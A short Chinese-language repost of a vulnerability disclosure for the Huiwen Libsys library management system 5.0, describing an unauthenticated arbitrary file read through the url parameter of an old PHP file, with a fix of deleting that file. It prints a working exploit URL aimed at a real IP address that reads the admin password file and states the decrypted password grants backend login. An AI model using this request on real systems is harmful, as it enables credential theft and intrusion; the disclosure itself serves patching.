好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

汇文软件Libsys图书馆管理系统任意文件读取及修

版本:5.0

 

不需要登录

 

/zplug/ajax_asyn_link.old.php

 

中参数url未合理过滤导致一处任意文件读取 漏洞

 

官方演示站点exp演示:

 

http://202.119.47.33:81/zplug/ajax_asyn_link.old.php?url=admin/opacadminpwd.php

 

查看源代码:

 

 

解密后可登陆后台成功:

 

修复: 经查为无效文件,可以删除

查看更多关于汇文软件Libsys图书馆管理系统任意文件读取及修的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15527
  阅读:54次

上一篇: dedecms SQL盲注漏洞(已经确定可以直接update出密码

下一篇:74cms逻辑漏洞导致二次SQL注入变为普通SQL注入 -